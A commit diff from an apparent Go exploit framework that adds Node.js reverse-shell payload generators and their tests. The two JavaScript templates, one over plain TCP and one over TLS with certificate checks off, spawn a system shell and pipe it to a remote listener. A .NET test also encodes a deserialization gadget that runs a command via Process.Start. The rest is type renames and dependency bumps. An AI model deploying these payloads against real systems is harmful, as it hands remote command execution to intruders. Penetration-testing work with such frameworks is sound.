Merge branch 'main' of github.com:vulncheck-oss/go-exploit

Author: lobsterjerusalem

dotnet/dotnetgadget.go

@@ -75,7 +75,7 @@ func TestGetBinaryObjectString(t *testing.T) {
 			</ObjectDataProvider.MethodParameters>
 		</ObjectDataProvider>
 	</ResourceDictionary>`, program, args)
-	got := BinaryObjectRecord{ObjectID: 3, Value: xmlData}
+	got := BinaryObjectString{ObjectID: 3, Value: xmlData}
 	got2, ok := got.ToRecordBin()
 
 	if !ok || fmt.Sprintf("%02x", got2) != "060300000096043c5265736f7572636544696374696f6e6172790a0909786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2f70726573656e746174696f6e220a0909786d6c6e733a583d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c220a0909786d6c6e733a533d22636c722d6e616d6573706163653a53797374656d3b617373656d626c793d6d73636f726c6962220a0909786d6c6e733a443d22636c722d6e616d6573706163653a53797374656d2e446961676e6f73746963733b617373656d626c793d73797374656d220a093e0a09093c4f626a6563744461746150726f766964657220583a4b65793d2222204f626a656374547970653d227b583a5479706520443a50726f636573737d22204d6574686f644e616d653d225374617274223e0a0909093c4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a090909093c533a537472696e673e636d643c2f533a537472696e673e0a090909093c533a537472696e673e2f632063616c633c2f533a537472696e673e0a0909093c2f4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a09093c2f4f626a6563744461746150726f76696465723e0a093c2f5265736f7572636544696374696f6e6172793e" {

dotnet/dotnetgadget_test.go

@@ -71,7 +71,7 @@ type ObjectNullMultiple256Record struct {
 
 type ObjectNullRecord struct{}
 
-type BinaryObjectRecord struct {
+type BinaryObjectString struct {
 	ObjectID int
 	Value    string
 }
@@ -121,7 +121,7 @@ func (classWithIDRecord ClassWithIDRecord) GetRecordType() int {
 	return RecordTypeEnumMap["ClassWithId"]
 }
 
-func (binaryObjectRecord BinaryObjectRecord) GetRecordType() int {
+func (binaryObjectString BinaryObjectString) GetRecordType() int {
 	return RecordTypeEnumMap["BinaryObjectString"]
 }
 
@@ -212,12 +212,12 @@ func (classWithIDRecord ClassWithIDRecord) ToXML(_ ClassInfo, _ MemberTypeInfo,
 	return MemberNode{}, false
 }
 
-func (binaryObjectRecord BinaryObjectRecord) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) {
+func (binaryObjectString BinaryObjectString) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) {
 	memberNode := MemberNode{}
 	memberNode.XMLName.Local = classInfo.MemberNames[currentIndex]
-	memberNode.ID = fmt.Sprintf("ref-%d", binaryObjectRecord.ObjectID)
+	memberNode.ID = fmt.Sprintf("ref-%d", binaryObjectString.ObjectID)
 	memberNode.XsiType = "xsd:" + strings.ToLower(memberTypeInfo.BinaryTypes[currentIndex])
-	memberNode.Content = escapeTags(binaryObjectRecord.Value)
+	memberNode.Content = escapeTags(binaryObjectString.Value)
 
 	return memberNode, true
 }
@@ -471,10 +471,10 @@ func (classWithIDRecord ClassWithIDRecord) ToRecordBin() (string, bool) {
 }
 
 // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/eb503ca5-e1f6-4271-a7ee-c4ca38d07996
-func (binaryObjectRecord BinaryObjectRecord) ToRecordBin() (string, bool) {
-	recordTypeEnumString := string(byte(binaryObjectRecord.GetRecordType()))
-	objectIDString := transform.PackLittleInt32(binaryObjectRecord.ObjectID)
-	prefixedValue := lengthPrefixedString(binaryObjectRecord.Value)
+func (binaryObjectString BinaryObjectString) ToRecordBin() (string, bool) {
+	recordTypeEnumString := string(byte(binaryObjectString.GetRecordType()))
+	objectIDString := transform.PackLittleInt32(binaryObjectString.ObjectID)
+	prefixedValue := lengthPrefixedString(binaryObjectString.Value)
 
 	return recordTypeEnumString + objectIDString + prefixedValue, true
 }
@@ -537,7 +537,7 @@ func (systemClassWithMembersAndTypesRecord SystemClassWithMembersAndTypesRecord)
 		return "", false
 	}
 
-	////////////////////////// ///objid, name, count, membernames//int8 type values+addInfo/the array of values
+	// objid, name, count, membernames//int8 type values+addInfo/the array of values
 	return recordTypeEnumString + systemClassWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + memberValuesString, true
 }
 
@@ -599,6 +599,6 @@ func (classWithMembersAndTypesRecord ClassWithMembersAndTypesRecord) ToRecordBin
 		return "", false
 	}
 
-	////////////////////////////// id, name, count, membernames+addinfo	         // the int8 values for types //the int32 ID// the array of values
+	// id, name, count, membernames+addinfo	the int8 values for types, the int32 ID, the array of values
 	return recordTypeEnumString + classWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + libraryIDString + memberValuesString, true
 }

dotnet/records.go

@@ -10,10 +10,10 @@ require (
 	github.com/icholy/digest v1.1.0
 	github.com/lor00x/goldap v0.0.0-20240304151906-8d785c64d1c8
 	github.com/vjeantet/ldapserver v1.0.2-0.20240305064909-a417792e2906
-	golang.org/x/crypto v0.44.0
+	golang.org/x/crypto v0.45.0
 	golang.org/x/net v0.47.0
 	golang.org/x/text v0.31.0
-	modernc.org/sqlite v1.40.0
+	modernc.org/sqlite v1.40.1
 )
 
 require (

go.mod

@@ -48,8 +48,8 @@ golang.org/x/crypto v0.13.0/go.mod h1:y6Z2r+Rw4iayiXXAIxJIDAJ1zMW4yaTpebo8fPOliY
 golang.org/x/crypto v0.19.0/go.mod h1:Iy9bg/ha4yyC70EfRS8jz+B6ybOBKMaSxLj6P6oBDfU=
 golang.org/x/crypto v0.23.0/go.mod h1:CKFgDieR+mRhux2Lsu27y0fO304Db0wZe70UKqHu0v8=
 golang.org/x/crypto v0.31.0/go.mod h1:kDsLvtWBEx7MV9tJOj9bnXsPbxwJQ6csT/x4KIN4Ssk=
-golang.org/x/crypto v0.44.0 h1:A97SsFvM3AIwEEmTBiaxPPTYpDC47w720rdiiUvgoAU=
-golang.org/x/crypto v0.44.0/go.mod h1:013i+Nw79BMiQiMsOPcVCB5ZIJbYkerPrGnOa00tvmc=
+golang.org/x/crypto v0.45.0 h1:jMBrvKuj23MTlT0bQEOBcAE0mjg8mK9RXFhRH6nyF3Q=
+golang.org/x/crypto v0.45.0/go.mod h1:XTGrrkGJve7CYK7J8PEww4aY7gM3qMCElcJQ8n8JdX4=
 golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b h1:M2rDM6z3Fhozi9O7NWsxAkg/yqS/lQJ6PmkyIV3YP+o=
 golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b/go.mod h1:3//PLf8L/X+8b4vuAfHzxeRUl04Adcb341+IGKfnqS8=
 golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
@@ -146,8 +146,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.40.0 h1:bNWEDlYhNPAUdUdBzjAvn8icAs/2gaKlj4vM+tQ6KdQ=
-modernc.org/sqlite v1.40.0/go.mod h1:9fjQZ0mB1LLP0GYrp39oOJXx/I2sxEnZtzCmEQIKvGE=
+modernc.org/sqlite v1.40.1 h1:VfuXcxcUWWKRBuP8+BR9L7VnmusMgBNNnBYGEe9w/iY=
+modernc.org/sqlite v1.40.1/go.mod h1:9fjQZ0mB1LLP0GYrp39oOJXx/I2sxEnZtzCmEQIKvGE=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=

go.sum

@@ -0,0 +1,24 @@
+package reverse
+
+import (
+	_ "embed"
+	"fmt"
+)
+
+var (
+
+	//go:embed nodejs/reverse.js
+	NodeJS string
+	//go:embed nodejs/reverse_tls.js
+	SecureNodeJS string
+)
+
+// NodeJS generates a Node compatible reverse shell with OS detection for Windows. It is not minified and utilizes double quotes.
+func (js *JavascriptPayload) NodeJS(lhost string, lport int) string {
+	return fmt.Sprintf(NodeJS, lport, lhost)
+}
+
+// SecureNodeJS generates a Node compatible reverse shell with TLS support with OS detection for Windows. It is not minified and utilizes double quotes.
+func (js *JavascriptPayload) SecureNodeJS(lhost string, lport int) string {
+	return fmt.Sprintf(SecureNodeJS, lport, lhost)
+}

payload/reverse/js.go

@@ -0,0 +1,16 @@
+(function(){
+	var net = require('net'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+	var sh = cp.spawn(shell, []);
+	var client = new net.Socket();
+	client.connect(%d, '%s', function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();

payload/reverse/nodejs/reverse.js

@@ -0,0 +1,18 @@
+(function(){
+	var tls = require('tls'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+
+	sh = cp.spawn(shell, []);
+	var client = new tls.TLSSocket();
+	options = {rejectUnauthorized: false}
+	client.connect(%d, '%s', options, function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();

payload/reverse/nodejs/reverse_tls.js

@@ -27,30 +27,32 @@ type Default interface{}
 
 // Defines the default Bash struct and all associated payload functions.
 type (
-	BashPayload      struct{}
-	GJScriptPayload  struct{}
-	JJSScriptPayload struct{}
-	JavaPayload      struct{}
-	NetcatPayload    struct{}
-	OpenSSLPayload   struct{}
-	PHPPayload       struct{}
-	PythonPayload    struct{}
-	TelnetPayload    struct{}
-	GroovyPayload    struct{}
-	VBSHTTPPayload   struct{}
+	BashPayload       struct{}
+	GJScriptPayload   struct{}
+	JJSScriptPayload  struct{}
+	JavascriptPayload struct{}
+	JavaPayload       struct{}
+	NetcatPayload     struct{}
+	OpenSSLPayload    struct{}
+	PHPPayload        struct{}
+	PythonPayload     struct{}
+	TelnetPayload     struct{}
+	GroovyPayload     struct{}
+	VBSHTTPPayload    struct{}
 )
 
 var (
 	// Example: makes the Bash payloads accessible via `reverse.Bash`.
-	Bash     = &BashPayload{}
-	GJScript = &GJScriptPayload{}
-	JJS      = &JJSScriptPayload{}
-	Java     = &JavaPayload{}
-	Netcat   = &NetcatPayload{}
-	OpenSSL  = &OpenSSLPayload{}
-	PHP      = &PHPPayload{}
-	Python   = &PythonPayload{}
-	Telnet   = &TelnetPayload{}
-	Groovy   = &GroovyPayload{}
-	VBSHTTP  = &VBSHTTPPayload{}
+	Bash       = &BashPayload{}
+	GJScript   = &GJScriptPayload{}
+	JJS        = &JJSScriptPayload{}
+	Java       = &JavaPayload{}
+	Javascript = &JavascriptPayload{}
+	Netcat     = &NetcatPayload{}
+	OpenSSL    = &OpenSSLPayload{}
+	PHP        = &PHPPayload{}
+	Python     = &PythonPayload{}
+	Telnet     = &TelnetPayload{}
+	Groovy     = &GroovyPayload{}
+	VBSHTTP    = &VBSHTTPPayload{}
 )

payload/reverse/reverse.go

@@ -184,6 +184,53 @@ func TestGroovyClassic(t *testing.T) {
 	}
 }
 
+func TestNodeJS(t *testing.T) {
+	payload := reverse.Javascript.NodeJS("127.0.0.3", 1312)
+	expected := `(function(){
+	var net = require('net'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+	var sh = cp.spawn(shell, []);
+	var client = new net.Socket();
+	client.connect(1312, '127.0.0.3', function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();`
+
+	if payload != expected {
+		t.Fatal(payload)
+	}
+
+	payload = reverse.Javascript.SecureNodeJS("127.0.0.4", 1312)
+	expected = `(function(){
+	var tls = require('tls'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+
+	sh = cp.spawn(shell, []);
+	var client = new tls.TLSSocket();
+	options = {rejectUnauthorized: false}
+	client.connect(1312, '127.0.0.4', options, function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();`
+	if payload != expected {
+		t.Fatal(payload)
+	}
+}
+
 func TestPython312(t *testing.T) {
 	payload := reverse.Python.SecurePython312("127.0.0.2", 9000)
 	expected := `import socket